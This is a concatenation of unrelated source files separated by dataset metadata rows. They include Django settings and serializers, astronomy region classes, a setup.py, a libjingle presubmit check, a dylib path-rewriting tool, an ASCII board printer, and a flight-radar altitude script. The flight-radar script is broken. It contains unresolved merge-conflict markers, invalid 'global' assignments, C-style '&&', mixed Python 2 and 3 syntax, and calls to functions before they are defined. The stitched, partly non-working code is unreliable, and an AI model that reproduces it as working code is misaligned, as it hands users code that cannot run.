CUSTOM_USER_MODEL = 'newproject.apps.account.CustomUser'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'newproject.apps.account',
    'newproject.apps.main',
    'compressor',
    'south',
    'registration',
    'widget_tweaks',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'newproject.urls'
WSGI_APPLICATION = 'newproject.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static/'),
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    'compressor.finders.CompressorFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
    'newproject/templates/',
)
LOGIN_REDIRECT_URL = '/'
# django-compressor: compiled assets live under the app's static dir, and
# *.less files are precompiled with the lessc binary from settings_local.
COMPRESS_ROOT = os.path.join(BASE_DIR, 'newproject', 'static')
COMPRESS_PRECOMPILERS = (
    ('text/less', '%s {infile} {outfile}' % LESSC_PATH),
)
| unlicense | 1,989,905,234,812,430,300 | 25.653226 | 75 | 0.722844 | false | 3.482613 | false | false | false |
SKIRT/PTS | magic/region/panda.py | 1 | 4117 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.region.panda Contains the PandaRegion class and subclasses.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.coordinates import Angle
from astropy.units import Quantity
# Import the relevant PTS classes and modules
from .region import Region, PixelRegion, SkyRegion, PhysicalRegion
from ..basics.coordinate import PixelCoordinate, SkyCoordinate, PhysicalCoordinate
# -----------------------------------------------------------------
class PandaRegion(Region):
    """Base class for ds9-style "panda" (pie-and-annulus) regions.

    Records the geometry shared by the pixel, sky and physical variants: a
    center, an angular range divided into ``nangle`` sectors, and a radial
    range divided into ``nradius`` annuli.
    """

    def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
        """Store the geometric parameters and initialize the base Region.

        :param center: center coordinate of the region
        :param start_angle: angle where the angular range begins
        :param stop_angle: angle where the angular range ends
        :param nangle: number of angular subdivisions
        :param inner: inner radius of the radial range
        :param outer: outer radius of the radial range
        :param nradius: number of radial subdivisions
        :param kwargs: forwarded to the Region base class
        """

        # Keep all parameters as plain attributes; no validation is done here
        # (the earlier angle check was already disabled upstream).
        self.center = center
        self.start_angle = start_angle
        self.stop_angle = stop_angle
        self.nangle = nangle
        self.inner = inner
        self.outer = outer
        self.nradius = nradius

        # Continue initialization up the MRO.
        super(PandaRegion, self).__init__(**kwargs)
# -----------------------------------------------------------------
class PixelPandaRegion(PandaRegion, PixelRegion):
    """Panda region expressed in pixel coordinates."""

    def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
        """See PandaRegion.__init__; the coordinates are pixel-based."""

        # PandaRegion is the first base, so super() resolves to it: it stores
        # the parameters and forwards **kwargs further up the MRO.
        super(PixelPandaRegion, self).__init__(
            center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
# -----------------------------------------------------------------
class SkyPandaRegion(PandaRegion, SkyRegion):
    """Panda region expressed in sky coordinates."""

    def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
        """See PandaRegion.__init__; the coordinates are sky-based."""

        # PandaRegion is the first base, so super() resolves to it: it stores
        # the parameters and forwards **kwargs further up the MRO.
        super(SkyPandaRegion, self).__init__(
            center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
# -----------------------------------------------------------------
class PhysicalPandaRegion(PandaRegion, PhysicalRegion):
    """Panda region expressed in physical coordinates."""

    def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
        """See PandaRegion.__init__; the coordinates are physical."""

        # PandaRegion is the first base, so super() resolves to it: it stores
        # the parameters and forwards **kwargs further up the MRO.
        super(PhysicalPandaRegion, self).__init__(
            center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
| agpl-3.0 | -4,254,293,722,206,895,000 | 30.661538 | 110 | 0.548105 | false | 4.609183 | false | false | false |
jor-/matrix-decomposition | setup.py | 1 | 2841 | # Copyright (C) 2017-2018 Joscha Reimer [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""A setuptools based setup module.
https://packaging.python.org/en/latest/distributing.html
"""
import setuptools
import os.path
import versioneer_extended
# Get the long description from the README file
readme_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README.rst')
with open(readme_file, mode='r', encoding='utf-8') as f:
    long_description = f.read()
# Setup
# Packaging metadata for the matrix-decomposition library; versioning is
# delegated to the versioneer_extended helper shipped with the repo.
setuptools.setup(
    # general informations
    name='matrix-decomposition',
    description='This library allows to approximate Hermitian (dense and sparse) matrices by positive definite matrices. Furthermore it allows to decompose (factorize) positive definite matrices and solve associated systems of linear equations.',
    long_description=long_description,
    keywords='approximation Hermitian dense sparse matrix matrices positive definite decompose factorize decomposition factorization linear equation equations Cholesky',
    url='https://github.com/jor-/matrix_decomposition',
    author='Joscha Reimer',
    author_email='[email protected]',
    license='AGPL',
    classifiers=[
        # Development Status
        'Development Status :: 5 - Production/Stable',
        # Intended Audience, Topic
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Mathematics',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Utilities',
        # Licence (should match "license" above)
        'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
        # Supported Python versions
        'Programming Language :: Python',
    ],
    # version
    version=versioneer_extended.get_version(),
    cmdclass=versioneer_extended.get_cmdclass(),
    # packages to install
    packages=setuptools.find_packages(),
    # dependencies
    python_requires='>=3.7',
    setup_requires=[
        'setuptools>=0.8',
        'pip>=1.4',
    ],
    install_requires=[
        'numpy>=1.15',
        'scipy>=0.19',
    ],
    extras_require={
        # Optional: sparse Cholesky support via scikit-sparse.
        'decompose_sparse': ['scikit-sparse>=0.4.2'],
    },
)
| agpl-3.0 | -9,103,944,859,064,064,000 | 35.423077 | 246 | 0.699754 | false | 4.105491 | false | false | false |
bpsinc-native/src_third_party_libjingle_source_talk | PRESUBMIT.py | 2 | 5115 | # libjingle
# Copyright 2013 Google Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# List of files that should not be committed to
# (these may only change when libjingle itself is imported; enforced by
# _ProtectedFiles below).
DO_NOT_SUBMIT_FILES = [
    "talk/media/webrtc/webrtcmediaengine.h",
    "talk/media/webrtc/webrtcvideoengine.cc",
    "talk/media/webrtc/webrtcvideoengine.h",
    "talk/media/webrtc/webrtcvideoengine_unittest.cc"]
def _LicenseHeader(input_api):
"""Returns the license header regexp."""
# Accept any year number from start of project to the current year
current_year = int(input_api.time.strftime('%Y'))
allowed_years = (str(s) for s in reversed(xrange(2004, current_year + 1)))
years_re = '(' + '|'.join(allowed_years) + ')'
years_re = '%s(--%s)?' % (years_re, years_re)
license_header = (
r'.*? libjingle\n'
r'.*? Copyright %(year)s,? Google Inc\.\n'
r'.*?\n'
r'.*? Redistribution and use in source and binary forms, with or without'
r'\n'
r'.*? modification, are permitted provided that the following conditions '
r'are met:\n'
r'.*?\n'
r'.*? 1\. Redistributions of source code must retain the above copyright '
r'notice,\n'
r'.*? this list of conditions and the following disclaimer\.\n'
r'.*? 2\. Redistributions in binary form must reproduce the above '
r'copyright notice,\n'
r'.*? this list of conditions and the following disclaimer in the '
r'documentation\n'
r'.*? and/or other materials provided with the distribution\.\n'
r'.*? 3\. The name of the author may not be used to endorse or promote '
r'products\n'
r'.*? derived from this software without specific prior written '
r'permission\.\n'
r'.*?\n'
r'.*? THIS SOFTWARE IS PROVIDED BY THE AUTHOR \`\`AS IS\'\' AND ANY '
r'EXPRESS OR IMPLIED\n'
r'.*? WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES '
r'OF\n'
r'.*? MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE '
r'DISCLAIMED\. IN NO\n'
r'.*? EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, '
r'INCIDENTAL,\n'
r'.*? SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES \(INCLUDING, '
r'BUT NOT LIMITED TO,\n'
r'.*? PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR '
r'PROFITS;\n'
r'.*? OR BUSINESS INTERRUPTION\) HOWEVER CAUSED AND ON ANY THEORY OF '
r'LIABILITY,\n'
r'.*? WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT \(INCLUDING '
r'NEGLIGENCE OR\n'
r'.*? OTHERWISE\) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, '
r'EVEN IF\n'
r'.*? ADVISED OF THE POSSIBILITY OF SUCH DAMAGE\.\n'
) % {
'year': years_re,
}
return license_header
def _ProtectedFiles(input_api, output_api):
  """Flag changes that touch files reserved for libjingle imports.

  Returns a single-element list containing a PresubmitError when any entry
  of DO_NOT_SUBMIT_FILES is part of the change, otherwise an empty list.
  """
  changed_files = [f.LocalPath() for f in input_api.AffectedFiles()]
  bad_files = list(set(DO_NOT_SUBMIT_FILES) & set(changed_files))
  if not bad_files:
    return []
  error_type = output_api.PresubmitError
  return [error_type(
      'The following affected files are only allowed to be updated when '
      'importing libjingle',
      bad_files)]
def _CommonChecks(input_api, output_api):
  """Checks common to both upload and commit."""
  # License-header check plus the protected-file check, concatenated in the
  # same order the results were previously accumulated.
  license_results = input_api.canned_checks.CheckLicense(
      input_api, output_api, _LicenseHeader(input_api))
  protected_results = _ProtectedFiles(input_api, output_api)
  return list(license_results) + list(protected_results)
def CheckChangeOnUpload(input_api, output_api):
  """Presubmit entry point run when a change is uploaded for review."""
  return list(_CommonChecks(input_api, output_api))
def CheckChangeOnCommit(input_api, output_api):
  """Presubmit entry point run when a change is committed."""
  return list(_CommonChecks(input_api, output_api))
| bsd-3-clause | -1,188,175,575,473,091,600 | 43.094828 | 80 | 0.682502 | false | 3.886778 | false | false | false |
EvangelouSotiris/flightradiationcalc | main.py | 1 | 5469 | import time
import requests
##############################################################
############## REQUESTS MANAGEMENT/ LINKS ####################
##############################################################
# Browser-like User-Agent so flightradar24's endpoint serves the JSON.
headers = {'User-Agent' : 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'}
# NOTE(review): unresolved merge conflict left in the file — the HEAD side
# prompts for a flight id, the other side hardcodes 'dfa6132'. The markers
# below are a syntax error and must be resolved before this script can run.
<<<<<<< HEAD
flight = input('Enter the number of your flight: ')
firstpart = 'https://data-live.flightradar24.com/clickhandler/?version=1.5&flight='
r = requests.get(firstpart+flight, headers = headers)
=======
r = requests.get('https://data-live.flightradar24.com/clickhandler/?version=1.5&flight=dfa6132', headers = headers)
>>>>>>> refs/remotes/GiorgosNikitopoulos/master
jsoned_response = r.json()
# NOTE(review): `global name = value` is invalid Python syntax; `global` is a
# declaration only, and is meaningless at module level anyway.
global limit = len(jsoned_response['trail']) #no need to declare that in every function
##############################################################
################### INITIALISATIONS ##########################
##############################################################
# NOTE(review): each_derivative is initialized twice (see a few lines below).
each_derivative = [None] * (limit - 1)
risingSpeed = [None]*limit
enRouteAlts = [0]*12
enRouteTimestamps = [0]*12
enRouteCounter = 0 #position on enRoute matrixes
possibleLastTimestamp = 0 #last timestamp of enroute flight - start of descension
each_derivative = [None] * (limit - 1)
y = [None] * (limit) #initialisation y-altitude , x-time and dy/dx derivative
x = [None] * (limit)
first_time_derivative_flag = 0
first_time_derivative_zero_flag = 0
##############################################################
################# MAIN PROGRAM/ LOOPS ########################
##############################################################
## Getting requests - heights , timestamps , and alt changing speed measurement ## needed in functions ##
# NOTE(review): this loop mixes invalid `global x[i] = ...` assignments, the
# C-style `&&` operator, and Python 2 print statements — none of which parse
# under Python 3. The intent appears to be: oldest-first altitude/timestamp
# series plus a finite-difference climb rate (TODO: confirm and rewrite).
for i in range(0, limit):
	global y[i] = jsoned_response['trail'][limit - 1 - i]['alt'] #values of altitudes
	if y[i] == None:
		print 'y is none in ' + str(i)
		break
	global x[i] = jsoned_response['trail'][limit - 1 - i]['ts'] #values of timestamps
	if x[i] == None:
		print 'x is none in ' + str(i)
		break #Break statements if x or y values are none (can't be used)
	if (i>0 && x[i-1]!= None && y[i-1]!= None):
		global each_derivative[i - 1] = float(float((y[i] - y[i-1])) / float((x[i] - x[i-1]))) #each derivative = speed of changing altitudes
	print x[i]
	print y[i]
	print each_derivative[i]
## Getting the response points where ascension ends and descension starts
# NOTE(review): these calls precede the function definitions below, so even
# with the syntax fixed they would raise NameError at import time.
ascensionFinishPoint = get_ascension_point(jsoned_response)
descensionStartingPoint = get_descension_point(jsoned_response)
##############################################################
################### FUNCTIONS ################################
##############################################################
## Functions for ascension and descension points
# Scans the climb-rate series for a sustained positive stretch (the climb
# phase). NOTE(review): relies on module globals (limit, each_derivative,
# first_time_derivate_flag, ...); because the flag variables are assigned
# inside the function without a `global` declaration, Python treats them as
# locals and the first read raises UnboundLocalError. The i+1/i+2 lookahead
# can also index past the end of each_derivative, and the computed
# `ascend_point` is never returned.
def get_ascension_point(jsoned_response):
	counter_ascend = 0 #counter will help us decide the stage of flight
	for i in range(0, limit):
		if(each_derivative[i] < 10 and each_derivative[i] > 0): #If u>10 for 6+ successive points=>ascension
			if(first_time_derivate_flag == 0):
				first_time_derivate_flag = 1
				possible_ascention_point = i
			counter_ascend = counter_ascend + 1
			print("counter_ascend = " , counter_ascend)
			counter_descend = 0
		else:
			counter_ascend = 0
			first_time_derivate_flag = 0
		if(counter_ascend > 0 or first_time_derivative_zero_flag == 1):
			first_time_derivative_zero_flag = 1
			if(each_derivative[i] < 5 and each_derivative[i + 1] < 5 and each_derivative[i + 2] < 5):
				print ("snap_ascend")
		if(counter_ascend >= 15): #into ascension stage
			ascend_point = i
			print ("snap_ascend")
# Mirror image of get_ascension_point: looks for a sustained negative climb
# rate above 18000 (units unstated — presumably feet; TODO confirm).
# NOTE(review): shares all the problems of get_ascension_point
# (UnboundLocalError on the flag variables, i+1/i+2 lookahead past the end
# of each_derivative, `descend_point` computed but never returned).
def get_descension_point(jsoned_response):
	counter_descend = 0
	for i in range(0, limit):
		if(each_derivative[i] > -10 and each_derivative[i] < 0 and y[i] > 18000): #If u>10 for 6+ successive points=>ascension
			if(first_time_derivate_flag == 0):
				first_time_derivate_flag = 1
				possible_ascention_point = i
			counter_descend = counter_descend + 1
			print("descend = " , counter_descend)
		else:
			counter_descend = 0
			first_time_derivate_flag = 0
		if(counter_descend > 0 or first_time_derivative_zero_flag == 1):
			first_time_derivative_zero_flag = 1
			if(each_derivative[i] > -5 and each_derivative[i + 1] > -5 and each_derivative[i + 2] > -5):
				print ("snap_descend")
		if(counter_descend >= 15): #into ascension stage
			descend_point = i
			print ("snap_descend")
##############################################################
############### OLD COMMITS/MAYBE USEFUL #####################
##############################################################
##ARTIFACT
######## EN ROUTE STAGE
# if (each_derivative>-5 and each_derivative<5): #En route stage of flight #######CHANGEABLE
# counter_ascend = 0
# counter_descend = 0
# # print ("snap_enroute")
# if (enRouteAlts[enRouteCounter] == 0): #1st time into en route stage
# enRouteAlts[enRouteCounter] = y[i]
# enRouteTimestamps[enRouteCounter] = x[i] #x1 time airplane got into that altitude
# if (abs(y[i]-enRouteAlts[enRouteCounter])>1000): #more than 1000 feet is considered another en route alt #######CHANGEABLE
# enRouteTimestamps[enRouteCounter] = x[i]-enRouteTimestamps[enRouteCounter] #x2-x1 time airplane stayed into former alt
# enRouteCounter = enRouteCounter + 1 #next altitude/timestamp matrix pos
# enRouteAlts[enRouteCounter] = y[i] #new alt
# enRouteTimestamps[enRouteCounter] = x[i] #x1 timestamp of new alt
| gpl-3.0 | -8,451,631,178,383,616,000 | 41.069231 | 135 | 0.588956 | false | 3.32462 | false | false | false |
KSG-IT/ksg-nett | api/serializers.py | 1 | 4959 | from django.conf import settings
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenObtainSlidingSerializer
from api.exceptions import InsufficientFundsException, NoSociSessionError
from economy.models import SociProduct, ProductOrder, SociSession, SociBankAccount
class CustomTokenObtainSlidingSerializer(TokenObtainSlidingSerializer):
    """
    Obtain a JWT for a user identified only by their card uuid.
    """
    username_field = "card_uuid"

    def __init__(self, *args, **kwargs):
        """
        Drop the `password` field that the parent `TokenObtainSerializer`
        declares, since card-based auth needs no password.
        """
        super().__init__(*args, **kwargs)
        self.fields.pop('password')

    def validate(self, attrs):
        """
        Skip the parent's username/password validation entirely and issue a
        token for the already-authenticated request user.
        """
        token = self.get_token(self.context['request'].user)
        return {'token': str(token)}
# ===============================
# ECONOMY
# ===============================
from sensors.consts import MEASUREMENT_TYPE_CHOICES
from sensors.models import SensorMeasurement
class SociProductSerializer(serializers.Serializer):
    """Read-only representation of a product sold at Soci."""
    sku_number = serializers.CharField(read_only=True, label="Product SKU number")
    name = serializers.CharField(read_only=True, label="Product name")
    price = serializers.IntegerField(read_only=True, label="Product price in NOK")
    description = serializers.CharField(read_only=True, allow_blank=True, allow_null=True, label="Product description",
                                        help_text="Returns `null` if no description exists")
    icon = serializers.CharField(read_only=True, label="Product icon descriptor")
class CheckBalanceSerializer(serializers.Serializer):
    """Read-only view of a Soci bank account's owner and balance."""
    id = serializers.IntegerField(read_only=True, label="This soci bank account ID")
    user = serializers.CharField(source='user.get_full_name', read_only=True, label="User´s full name")
    balance = serializers.IntegerField(read_only=True, label="Balance in NOK",
                                       help_text="Should not be displayed publicly")
class ChargeSociBankAccountDeserializer(serializers.Serializer):
    """
    Deserializer for one purchase line: a product SKU plus an order size.

    Cross-field validation resolves the unit amount, accumulates the running
    request total in `self.context['total']`, and rejects the charge when the
    account cannot cover it or when no Soci session is active.
    """
    sku = serializers.CharField(label="Product SKU number to charge for")
    order_size = serializers.IntegerField(default=1, required=False, label="Order size for this product",
                                          help_text="Defaults to 1 if not supplied")
    @staticmethod
    def validate_sku(value):
        # Field-level check: the SKU must refer to an existing product.
        if not SociProduct.objects.filter(sku_number=value).exists():
            raise serializers.ValidationError('SKU number is invalid.')
        return value
    @staticmethod
    def validate_order_size(value):
        # Field-level check: zero or negative order sizes are rejected.
        if value <= 0:
            raise serializers.ValidationError('Order size must be positive.')
        return value
    def validate(self, attrs):
        # The special direct-charge SKU uses a unit amount of 1 (so the order
        # size itself is the amount); everything else uses the listed price.
        if attrs['sku'] != settings.DIRECT_CHARGE_SKU:
            attrs['amount'] = SociProduct.objects.get(sku_number=attrs['sku']).price
        else:
            attrs['amount'] = 1
        # `total` is shared through the serializer context so one request can
        # carry several charge lines against the same account.
        self.context['total'] += attrs['amount'] * attrs['order_size']
        if self.context['total'] > self.context['soci_bank_account'].balance:
            raise InsufficientFundsException()
        if SociSession.get_active_session() is None:
            raise NoSociSessionError()
        return attrs
    def create(self, validated_data):
        # `sku` is popped so the remaining validated fields (order_size,
        # amount, ...) pass straight through to ProductOrder.objects.create.
        product_order = ProductOrder.objects.create(
            product=SociProduct.objects.get(sku_number=validated_data.pop('sku')), **validated_data
        )
        return product_order
class PurchaseSerializer(serializers.Serializer):
    """Read-only summary returned after a purchase has been performed."""
    amount_charged = serializers.IntegerField(read_only=True, source='total_amount',
                                              label="Amount that was charged from user´s Soci account")
    amount_remaining = serializers.IntegerField(read_only=True, source='source.balance',
                                                label="Remaining balance in user´s Soci account",
                                                help_text="Should not be displayed publicly")
    products_purchased = serializers.ListField(read_only=True, child=serializers.CharField(),
                                               help_text="The products that were purchased")
class SensorMeasurementSerializer(serializers.Serializer):
    """Validates and persists a single sensor measurement."""
    type = serializers.ChoiceField(
        choices=MEASUREMENT_TYPE_CHOICES,
        label="The type of measurement.",
    )
    value = serializers.FloatField(
        label="The value of the measurement",
    )
    created_at = serializers.DateTimeField(
        label="The time of the measurement",
    )
    def create(self, validated_data):
        # Persist straight to the SensorMeasurement model.
        return SensorMeasurement.objects.create(**validated_data)
| gpl-3.0 | 6,613,007,558,135,177,000 | 36.545455 | 119 | 0.650525 | false | 4.460846 | false | false | false |
fordcars/SDL3D | tools/Frameworkify/frameworkify.py | 1 | 3860 | #!/usr/bin/env python -S
# -*- coding: utf-8 -*-
r"""
frameworkify
~~~~~~~~~~~~
A small command line tool that can rewrite the paths to dynamic
loaded libraries in .dylib files so that they reference other
paths. By default it will rewrite the path so that it points to
the bundle's Frameworks folder. This can be paired with a CMake
post build action to make proper bundles without having to
recompile a bunch of dylibs to reference the framework.
Usage::
$ frameworkify.py MyApplication.app/Contents/MacOS/MyApplication \
> /path/to/mylib.dylib
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from optparse import OptionParser
def find_bundle(executable):
    """Return the bundle's Contents directory for a bundled executable.

    The executable must exist and live in a ``<Bundle>.app/Contents/MacOS``
    directory; a RuntimeError is raised otherwise.
    """
    executable = os.path.abspath(executable)
    if not os.path.isfile(executable):
        raise RuntimeError('Executable does not exist')
    macos_dir = os.path.dirname(executable)
    content_path, leaf = os.path.split(macos_dir)
    if leaf != 'MacOS':
        raise RuntimeError('Executable not located inside a bundle')
    return content_path
def find_baked_dylibs(executable):
    """Return the dylib install names `otool -L` reports for `executable`."""
    from subprocess import Popen, PIPE
    proc = Popen(['otool', '-L', executable], stdout=PIPE)
    output = proc.communicate()[0]
    # The first line is the file name itself; each remaining line looks like
    # "\t/path/to/lib.dylib (compatibility version ...)".
    entries = output.splitlines()[1:]
    return [line.strip().split(' (')[0] for line in entries]
def find_matching_dylib(dylibs, basename):
    """Return the first dylib path whose basename matches, ignoring case.

    Returns None when nothing matches.
    """
    wanted = basename.lower()
    for candidate in dylibs:
        if os.path.basename(candidate).lower() == wanted:
            return candidate
def rewrite_path(executable, old, new):
    """Rewrite one dynamic-library install name inside `executable`.

    Shells out to Apple's `install_name_tool -change old new` and waits for
    it to finish; the tool's exit status is not checked.
    """
    from subprocess import Popen
    Popen(['install_name_tool', '-change', old, new, executable]).wait()
def copy_to_framework(bundle_path, filename, target_name):
    """Copy `filename` into the bundle's Frameworks folder as `target_name`.

    The Frameworks directory is created on first use; copy2 preserves file
    metadata alongside the contents.
    """
    from shutil import copy2
    frameworks_dir = os.path.join(bundle_path, 'Frameworks')
    if not os.path.isdir(frameworks_dir):
        os.mkdir(frameworks_dir)
    copy2(filename, os.path.join(frameworks_dir, target_name))
def perform_rewrite_operation(rewrites, executable, bundle_path, copy=True):
    """Apply a batch of (old_path, new_path, dylib_path) rewrites.

    Each entry rewrites one install name inside `executable`; when `copy` is
    true the backing dylib is also copied into the bundle's Frameworks folder
    under the new path's basename.
    """
    for old_path, new_path, dylib_path in rewrites:
        rewrite_path(executable, old_path, new_path)
        if not copy:
            continue
        target_name = os.path.basename(new_path)
        copy_to_framework(bundle_path, dylib_path, target_name)
def frameworkify(executable, dylibs, nocopy, path):
    """Rewrite the given dylib references of a bundled executable.

    For every requested dylib, the matching install name baked into the
    executable is redirected either to `path` or to the bundle-relative
    Frameworks folder; unless `nocopy` is set, the dylib is copied there too.
    """
    bundle = find_bundle(executable)
    baked = find_baked_dylibs(executable)

    rewrites = []
    for dylib in dylibs:
        name = os.path.basename(dylib)
        match = find_matching_dylib(baked, name)
        if match is None:
            raise Exception('dylib "%s" is not referenced by "%s"' % (
                name,
                executable
            ))
        if path:
            new_path = os.path.join(path, name)
        else:
            new_path = '@executable_path/../Frameworks/' + name
        rewrites.append((match, new_path, dylib))

    perform_rewrite_operation(rewrites, executable, bundle, not nocopy)
def main():
    """Command line entry point: parse options and run frameworkify()."""
    parser = OptionParser()
    parser.add_option('-p', '--path', dest='path', metavar='PATH',
                      help='alternative path to dylib')
    parser.add_option('-C', '--nocopy', dest='nocopy', action='store_true',
                      help='don\'t copy dylib to framework folder')
    # parse_args() defaults to sys.argv[1:]. The previous code passed
    # sys.argv whole, which made argv[0] (this script's path) the first
    # positional argument and therefore the "executable" handed to
    # frameworkify().
    opts, args = parser.parse_args()
    if len(args) < 2:
        parser.error('Not enough arguments: executable and a list of dylibs')
    if opts.path and not opts.nocopy:
        parser.error('Path combined with copy operation is not supported')
    try:
        frameworkify(args[0], args[1:], opts.nocopy, opts.path)
    except Exception as e:
        # `except ... as ...` is valid on Python 2.6+ and Python 3; the old
        # `except Exception, e:` form is a syntax error under Python 3.
        # parser.error() already exits with a nonzero status, so the old
        # unreachable sys.exit(1) after it has been dropped.
        parser.error(str(e))

if __name__ == '__main__':
    main()
acbilson/forbidden-island | tests/test_print.py | 1 | 1905 | import sys
sys.path.append('../src')
from tiles import *
from tile import *
class Test(object):
    """Renders a 24-tile board as ASCII art.

    Each tile is drawn as three stacked segments — name, player, status —
    wrapped in /…\, |…| and \…/ delimiters; the six board rows contain
    2/4/6/6/4/2 tiles respectively.
    """

    def __init__(self):
        self.board = ""

    def gen_board(self, tiles):
        """Return the full board string for a 24-tile sequence."""
        rows = [[0, 1],
                [2, 3, 4, 5],
                [6, 7, 8, 9, 10, 11],
                [12, 13, 14, 15, 16, 17],
                [18, 19, 20, 21],
                [22, 23]]
        # Leading padding that roughly centres the shorter rows.
        pads = ['    ', '  ', '', '', '  ', '    ']

        names = [t.name for t in tiles]
        players = [t.player for t in tiles]
        statuses = [t.status for t in tiles]

        pieces = []
        for row, pad in zip(rows, pads):
            pieces.append(''.join(self._gen_segments(row, pad, ('/', '\\'), names)))
            pieces.append(''.join(self._gen_segments(row, pad, ('|', '|'), players)))
            pieces.append(''.join(self._gen_segments(row, pad, ('\\', '/'), statuses,
                                                     newLine=True)))
        return ''.join(pieces)

    def _gen_segments(self, row, space, dividers, tileSegments, newLine=None):
        """Build the text fragments for one segment line of one board row."""
        opener, closer = dividers
        chunk = tileSegments[row[0]:row[-1] + 1]

        fragments = [space]
        for segment in chunk:
            fragments.append(opener + segment.value + closer)
            # NOTE(review): the original guard (`len(rowSegments) != i`) was
            # always true, so every tile — including the last in a row — is
            # followed by a separator space; preserved here for identical
            # output.
            fragments.append(' ')
        fragments.append(space + '\n')
        if newLine is not None:
            fragments.append('\n')
        return fragments
# Manual smoke test: build the standard tile set and print the rendered board.
if __name__ == '__main__':
  tiles = Tiles()
  t = Test()
  board = t.gen_board(tiles.tiles)
  print(board)
Inboxen/website | views/inbox/delete.py | 1 | 2017 | ##
# Copyright (C) 2013 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
